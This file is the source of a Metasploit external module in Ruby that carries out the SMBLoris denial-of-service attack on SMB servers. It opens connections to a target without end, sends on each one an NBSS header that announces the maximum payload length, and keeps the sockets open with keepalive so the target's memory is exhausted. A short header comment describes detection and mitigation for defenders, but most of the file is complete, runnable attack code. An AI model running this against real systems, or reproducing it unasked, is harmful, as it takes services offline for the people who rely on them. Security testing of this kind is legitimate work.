Path: blob/master/modules/auxiliary/dos/smb/smb_loris.rb
#!/usr/bin/env ruby

# External Metasploit module: SMBLoris NBSS denial of service.
#
# What goes on the wire, as far as this file shows: for every connection the
# module sends one 4-byte NetBIOS Session Service header whose 17-bit length
# field is set to 0x1FFFF, and then sends nothing else. The socket is kept
# open with TCP keepalive. Per the module description, the target holds
# memory for each such session until the connection goes away.
#
# Review note for defenders: the observable pattern is a large and growing
# number of concurrent TCP sessions to the SMB port from one source, each
# carrying only an NBSS header that announces a maximum-size payload that
# never arrives. Capping concurrent connections per source on the SMB port
# and not exposing SMB to untrusted networks bound the impact.

require 'socket'
require 'metasploit'

require 'bindata'

# NBSS header as serialised by this module: an 8-bit message type, 7 flag
# bits and a 17-bit message length, 32 bits in total.
class NbssHeader < BinData::Record
  endian :little
  uint8 :message_type
  bit7 :flags
  bit17 :message_length
end

# Module metadata handed to Metasploit.run: name, description, authors,
# disclosure date, references, module type and the two required options.
metadata = {
  name: 'SMBLoris NBSS Denial of Service',
  description: %q{
    The SMBLoris attack consumes large chunks of memory in the target by sending
    SMB requests with the NetBios Session Service(NBSS) Length Header value set
    to the maximum possible value. By keeping these connections open and initiating
    large numbers of these sessions, the memory does not get freed, and the server
    grinds to a halt. This vulnerability was originally disclosed by Sean Dillon
    and Zach Harding.

    DISCLAIMER: This module opens a lot of simultaneous connections. Please check
    your system's ULIMIT to make sure it can handle it. This module will also run
    continuously until stopped.
  },
  authors: [
    'thelightcosine',
    'Adam Cammack <adam_cammack[at]rapid7.com>'
  ],
  date: '2017-06-29',
  references: [
    { type: 'url', ref: 'https://web.archive.org/web/20170804072329/https://smbloris.com/' },
    { type: 'aka', ref: 'SMBLoris' }
  ],
  type: 'dos',
  options: {
    rhost: { type: 'address', description: 'The target address', required: true, default: nil },
    rport: { type: 'port', description: 'SMB port on the target', required: true, default: 445 }
  }
}

# Module entry point. Loops until interrupted, opening one connection per
# iteration, writing the NBSS header on it and keeping the socket in a list.
#
# @param args [Hash] module options; :rhost and :rport are read
# @return [nil] once an Interrupt has been handled and the loop left
def run(args)
  nbss = NbssHeader.new
  # All 17 bits set: the largest value the length field can carry.
  nbss.message_length = 0x01FFFF

  reported_count = 0
  limit_warning_sent = false
  iterations = 0
  open_sockets = []

  target = Addrinfo.tcp(args[:rhost], args[:rport].to_i)

  Metasploit.logging_prefix = "#{target.inspect_sockaddr} - "

  loop do
    begin
      # Forget sockets that have been closed locally (see the EMFILE branch).
      open_sockets.reject!(&:closed?)

      conn = target.connect(timeout: 360)
      # Keepalive on, 5 probes, 10 apart; linger enabled with a value of 60.
      conn.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true)
      conn.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5))
      conn.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10))
      conn.setsockopt(Socket::Option.linger(true, 60))
      # Only the header is written; no payload follows on this connection.
      conn.write(nbss.to_binary_s)
      # A socket is tracked only after the write succeeded; one that raised
      # above is neither listed nor explicitly closed here.
      open_sockets << conn

      iterations += 1
      held = open_sockets.length
      if held == reported_count
        # Count unchanged since the last report: log at a lower frequency.
        Metasploit.log "Holding steady at #{held} socket(s) open", level: 'info' if (iterations % 1000).zero?
      elsif (iterations % 100).zero?
        reported_count = held
        Metasploit.log "#{held} socket(s) open", level: 'info'
      end
    rescue Interrupt
      # Operator stop: release every tracked socket and leave the loop.
      open_sockets.each(&:close)
      break
    rescue Errno::EMFILE
      # Local descriptor limit reached. Warn once, then close the oldest
      # tracked socket so the next iteration can open a new one.
      unless limit_warning_sent
        Metasploit.log "At open socket limit with #{open_sockets.length} sockets open. Try increasing your system limits.", level: 'warning'
      end
      limit_warning_sent = true
      # NOTE(review): with an empty list this is nil.close, and the
      # NoMethodError raised here is not caught by the clauses of this block.
      open_sockets.first.close
    rescue StandardError => e
      Metasploit.log "Exception sending packet: #{e.message}", level: 'error'
    end
  end
end

Metasploit.run(metadata, method(:run)) if __FILE__ == $PROGRAM_NAME